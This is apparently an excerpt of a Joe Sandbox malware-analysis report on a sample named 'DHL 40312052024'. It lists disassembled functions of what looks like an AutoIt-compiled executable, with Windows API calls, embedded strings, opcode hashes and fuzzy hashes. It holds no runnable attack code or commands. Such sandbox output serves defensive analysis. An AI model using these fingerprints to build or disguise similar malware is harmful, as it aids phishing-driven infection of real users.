                                                                                    • CharUpperBuffW.USER32(?,?,0083F910), ref: 00833627
                                                                                    • IsWindowVisible.USER32(?), ref: 0083364B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharUpperVisibleWindow
                                                                                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                    • API String ID: 4105515805-45149045
                                                                                    • Opcode ID: bb607d96c7ea70c5d2a6758b62552b6491a7bc15c089a88e36a80249ed50b351
                                                                                    • Instruction ID: 8812d65b8445a64750004ae86f802ac15a38537f5baa5c161c1269ec81c9a790
                                                                                    • Opcode Fuzzy Hash: bb607d96c7ea70c5d2a6758b62552b6491a7bc15c089a88e36a80249ed50b351
                                                                                    • Instruction Fuzzy Hash: 97D16D30208301DBCA04EF14C856B6E77A5FFD5354F158868F9869B3E2DB35EA4ACB81
                                                                                    Function 0083A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetTextColor.GDI32(?,00000000), ref: 0083A630
                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0083A661
                                                                                    • GetSysColor.USER32(0000000F), ref: 0083A66D
                                                                                    • SetBkColor.GDI32(?,000000FF), ref: 0083A687
                                                                                    • SelectObject.GDI32(?,00000000), ref: 0083A696
                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0083A6C1
                                                                                    • GetSysColor.USER32(00000010), ref: 0083A6C9
                                                                                    • CreateSolidBrush.GDI32(00000000), ref: 0083A6D0
                                                                                    • FrameRect.USER32(?,?,00000000), ref: 0083A6DF
                                                                                    • DeleteObject.GDI32(00000000), ref: 0083A6E6
                                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 0083A731
                                                                                    • FillRect.USER32(?,?,00000000), ref: 0083A763
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0083A78E
                                                                                      • Part of subcall function 0083A8CA: GetSysColor.USER32(00000012), ref: 0083A903
                                                                                      • Part of subcall function 0083A8CA: SetTextColor.GDI32(?,?), ref: 0083A907
                                                                                      • Part of subcall function 0083A8CA: GetSysColorBrush.USER32(0000000F), ref: 0083A91D
                                                                                      • Part of subcall function 0083A8CA: GetSysColor.USER32(0000000F), ref: 0083A928
                                                                                      • Part of subcall function 0083A8CA: GetSysColor.USER32(00000011), ref: 0083A945
                                                                                      • Part of subcall function 0083A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0083A953
                                                                                      • Part of subcall function 0083A8CA: SelectObject.GDI32(?,00000000), ref: 0083A964
                                                                                      • Part of subcall function 0083A8CA: SetBkColor.GDI32(?,00000000), ref: 0083A96D
                                                                                      • Part of subcall function 0083A8CA: SelectObject.GDI32(?,?), ref: 0083A97A
                                                                                      • Part of subcall function 0083A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0083A999
                                                                                      • Part of subcall function 0083A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0083A9B0
                                                                                      • Part of subcall function 0083A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0083A9C5
                                                                                      • Part of subcall function 0083A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0083A9ED
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                    • String ID:
                                                                                    • API String ID: 3521893082-0
                                                                                    • Opcode ID: 646a99732f1a9ce27f5336e2766789867ab89069605fcf79c46e89d483857366
                                                                                    • Instruction ID: d9ed8db7a47cf88ac6ebaa3ebbba998ea24e66ed2a873cf874643c90f301f150
                                                                                    • Opcode Fuzzy Hash: 646a99732f1a9ce27f5336e2766789867ab89069605fcf79c46e89d483857366
                                                                                    • Instruction Fuzzy Hash: 72916D72408305FFCB159F64DC48A5B7BA9FBC8321F104E29F6A2D61A2D771D944CB92
                                                                                    Function 007B2C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DestroyWindow.USER32(?,?,?), ref: 007B2CA2
                                                                                    • DeleteObject.GDI32(00000000), ref: 007B2CE8
                                                                                    • DeleteObject.GDI32(00000000), ref: 007B2CF3
                                                                                    • DestroyIcon.USER32(00000000,?,?,?), ref: 007B2CFE
                                                                                    • DestroyWindow.USER32(00000000,?,?,?), ref: 007B2D09
                                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 007EC43B
                                                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 007EC474
                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 007EC89D
                                                                                      • Part of subcall function 007B1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,007B2036,?,00000000,?,?,?,?,007B16CB,00000000,?), ref: 007B1B9A
                                                                                    • SendMessageW.USER32(?,00001053), ref: 007EC8DA
                                                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 007EC8F1
                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 007EC907
                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 007EC912
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                    • String ID: 0
                                                                                    • API String ID: 464785882-4108050209
                                                                                    • Opcode ID: c44254155987326cd78f64340a2ce739b268dca8a9cdafd771b002d5af399cd7
                                                                                    • Instruction ID: 25f823194422ef64f77d9a6e80f2cdb574322e4b6da04191b9816b7cb6c4a7b9
                                                                                    • Opcode Fuzzy Hash: c44254155987326cd78f64340a2ce739b268dca8a9cdafd771b002d5af399cd7
                                                                                    • Instruction Fuzzy Hash: B7129E34602241EFDB16CF25C988BA9BBE1BF49300F544969F595CB262C739E853CBA1
                                                                                    Function 008274AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DestroyWindow.USER32(00000000), ref: 008274DE
                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0082759D
                                                                                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 008275DB
                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 008275ED
                                                                                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00827633
                                                                                    • GetClientRect.USER32(00000000,?), ref: 0082763F
                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00827683
                                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00827692
                                                                                    • GetStockObject.GDI32(00000011), ref: 008276A2
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 008276A6
                                                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 008276B6
                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008276BF
                                                                                    • DeleteDC.GDI32(00000000), ref: 008276C8
                                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 008276F4
                                                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 0082770B
                                                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00827746
                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0082775A
                                                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 0082776B
                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0082779B
                                                                                    • GetStockObject.GDI32(00000011), ref: 008277A6
                                                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 008277B1
                                                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 008277BB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                    • API String ID: 2910397461-517079104
                                                                                    • Opcode ID: 36bad4ec1fbe2de00245b99608a63a0e0b069c5cfb320897de5beeba99adedaf
                                                                                    • Instruction ID: fc45ce4af9f540eca66f3a2650ee433def5766b8b8cff16a14fb6031852cb9a8
                                                                                    • Opcode Fuzzy Hash: 36bad4ec1fbe2de00245b99608a63a0e0b069c5cfb320897de5beeba99adedaf
                                                                                    • Instruction Fuzzy Hash: 6FA16DB1A00615BFEB14DBA4DC4AFAEBBA9FB44710F004514FA14E72E1D7B4AD40CBA4
                                                                                    Function 0081AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0081AD1E
                                                                                    • GetDriveTypeW.KERNEL32(?,0083FAC0,?,\\.\,0083F910), ref: 0081ADFB
                                                                                    • SetErrorMode.KERNEL32(00000000,0083FAC0,?,\\.\,0083F910), ref: 0081AF59
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode$DriveType
                                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                    • API String ID: 2907320926-4222207086
                                                                                    • Opcode ID: de7bdf55b74781c2cee82bb25c5f5a9f482d8ffc2db955fe0ced8264d611233c
                                                                                    • Instruction ID: 1ba8c9e3fbb8395aa34fc7f566c0ab269ccf8e15b6a551cd335cb3a61836e5de
                                                                                    • Opcode Fuzzy Hash: de7bdf55b74781c2cee82bb25c5f5a9f482d8ffc2db955fe0ced8264d611233c
                                                                                    • Instruction Fuzzy Hash: 3051AEB064A209EB8B18DB50D942DFD73A8FF48714B204157E81AE72D1CE35DD86EB43
                                                                                    Function 007B68DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: __wcsnicmp
                                                                                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                    • API String ID: 1038674560-86951937
                                                                                    • Opcode ID: 57624353ada72777d8e2ccf960f2d36ce3176848ca6fea17c57712757f8108d7
                                                                                    • Instruction ID: 52eb2f68faa121805aa5adc2ce71b5f206ba2719d04b33d4af58399f04fb9510
                                                                                    • Opcode Fuzzy Hash: 57624353ada72777d8e2ccf960f2d36ce3176848ca6fea17c57712757f8108d7
                                                                                    • Instruction Fuzzy Hash: 5D8105B0600205EACF20BB61DC86FFE7768FF15710F044029FA05AA296EB7CDA55D6A1
                                                                                    Function 00839A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00839AD2
                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00839B8B
                                                                                    • SendMessageW.USER32(?,00001102,00000002,?), ref: 00839BA7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window
                                                                                    • String ID: 0
                                                                                    • API String ID: 2326795674-4108050209
                                                                                    • Opcode ID: 2ddfd07a3555888a30a1257ec8cc2d98b6186f9b85ddf82e1dfb56fd72accc78
                                                                                    • Instruction ID: 48ae339283f07c9d808f57366d8c2ee0790ff635bd40940cb2d3d73095f3f4b0
                                                                                    • Opcode Fuzzy Hash: 2ddfd07a3555888a30a1257ec8cc2d98b6186f9b85ddf82e1dfb56fd72accc78
                                                                                    • Instruction Fuzzy Hash: DB02AC30504201AFDB25CF24C889BAABBE5FF89314F04892DF9D9D62A1D7B4D945CBD2
                                                                                    Function 0083A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetSysColor.USER32(00000012), ref: 0083A903
                                                                                    • SetTextColor.GDI32(?,?), ref: 0083A907
                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0083A91D
                                                                                    • GetSysColor.USER32(0000000F), ref: 0083A928
                                                                                    • CreateSolidBrush.GDI32(?), ref: 0083A92D
                                                                                    • GetSysColor.USER32(00000011), ref: 0083A945
                                                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0083A953
                                                                                    • SelectObject.GDI32(?,00000000), ref: 0083A964
                                                                                    • SetBkColor.GDI32(?,00000000), ref: 0083A96D
                                                                                    • SelectObject.GDI32(?,?), ref: 0083A97A
                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0083A999
                                                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0083A9B0
                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0083A9C5
                                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0083A9ED
                                                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0083AA14
                                                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 0083AA32
                                                                                    • DrawFocusRect.USER32(?,?), ref: 0083AA3D
                                                                                    • GetSysColor.USER32(00000011), ref: 0083AA4B
                                                                                    • SetTextColor.GDI32(?,00000000), ref: 0083AA53
                                                                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0083AA67
                                                                                    • SelectObject.GDI32(?,0083A5FA), ref: 0083AA7E
                                                                                    • DeleteObject.GDI32(?), ref: 0083AA89
                                                                                    • SelectObject.GDI32(?,?), ref: 0083AA8F
                                                                                    • DeleteObject.GDI32(?), ref: 0083AA94
                                                                                    • SetTextColor.GDI32(?,?), ref: 0083AA9A
                                                                                    • SetBkColor.GDI32(?,?), ref: 0083AAA4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                    • String ID:
                                                                                    • API String ID: 1996641542-0
                                                                                    • Opcode ID: 4aa8a4d02ef71e25fc64189ee81ab7fd3618d3153958f1a69adcd9143dbbfafc
                                                                                    • Instruction ID: 7c0b8289e934e96e127b7ba0410b04638b6a42f40858a4d947db344b9589d7a0
                                                                                    • Opcode Fuzzy Hash: 4aa8a4d02ef71e25fc64189ee81ab7fd3618d3153958f1a69adcd9143dbbfafc
                                                                                    • Instruction Fuzzy Hash: 4F511B71D00208FFDF119FA4DC49EAE7B79FB88320F114625FA11AB2A2D7759940DB90
                                                                                    Function 008389D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00838AC1
                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00838AD2
                                                                                    • CharNextW.USER32(0000014E), ref: 00838B01
                                                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00838B42
                                                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00838B58
                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00838B69
                                                                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00838B86
                                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 00838BD8
                                                                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00838BEE
                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00838C1F
                                                                                    • _memset.LIBCMT ref: 00838C44
                                                                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00838C8D
                                                                                    • _memset.LIBCMT ref: 00838CEC
                                                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00838D16
                                                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 00838D6E
                                                                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 00838E1B
                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00838E3D
                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00838E87
                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00838EB4
                                                                                    • DrawMenuBar.USER32(?), ref: 00838EC3
                                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 00838EEB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                    • String ID: 0
                                                                                    • API String ID: 1073566785-4108050209
                                                                                    • Opcode ID: 2b7f7ecdfdeb05beea4939a3401f96cdb5a7516d634dc285eb98cf2b5f4c7000
                                                                                    • Instruction ID: bf97b96818950d83a8bbf5c40a230d0d0c4425b812d6cadbf346d4b5c516dabd
                                                                                    • Opcode Fuzzy Hash: 2b7f7ecdfdeb05beea4939a3401f96cdb5a7516d634dc285eb98cf2b5f4c7000
                                                                                    • Instruction Fuzzy Hash: D5E16DB1900318EFDB209F64CC89AEE7B79FF85710F108156FA15EA291DB748981DFA1
                                                                                    Function 0083488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCursorPos.USER32(?), ref: 008349CA
                                                                                    • GetDesktopWindow.USER32 ref: 008349DF
                                                                                    • GetWindowRect.USER32(00000000), ref: 008349E6
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00834A48
                                                                                    • DestroyWindow.USER32(?), ref: 00834A74
                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00834A9D
                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00834ABB
                                                                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00834AE1
                                                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 00834AF6
                                                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00834B09
                                                                                    • IsWindowVisible.USER32(?), ref: 00834B29
                                                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00834B44
                                                                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00834B58
                                                                                    • GetWindowRect.USER32(?,?), ref: 00834B70
                                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00834B96
                                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 00834BB0
                                                                                    • CopyRect.USER32(?,?), ref: 00834BC7
                                                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 00834C32
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                    • String ID: ($0$tooltips_class32
                                                                                    • API String ID: 698492251-4156429822
                                                                                    • Opcode ID: 2a950781bf4ed3b2430fb79f5996b9dfe2e6b22c644c9a86647bb6202db00bff
                                                                                    • Instruction ID: 5d5a4b2dd248df8e8fcca22cfbfd086d037308e26a67173164132348919dc7bc
                                                                                    • Opcode Fuzzy Hash: 2a950781bf4ed3b2430fb79f5996b9dfe2e6b22c644c9a86647bb6202db00bff
                                                                                    • Instruction Fuzzy Hash: 6CB17A71608350AFDB04DF64C849B6ABBE5FF88314F00891CFA9A9B2A1D775EC05CB95
                                                                                    Function 0081449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 008144AC
                                                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 008144D2
                                                                                    • _wcscpy.LIBCMT ref: 00814500
                                                                                    • _wcscmp.LIBCMT ref: 0081450B
                                                                                    • _wcscat.LIBCMT ref: 00814521
                                                                                    • _wcsstr.LIBCMT ref: 0081452C
                                                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00814548
                                                                                    • _wcscat.LIBCMT ref: 00814591
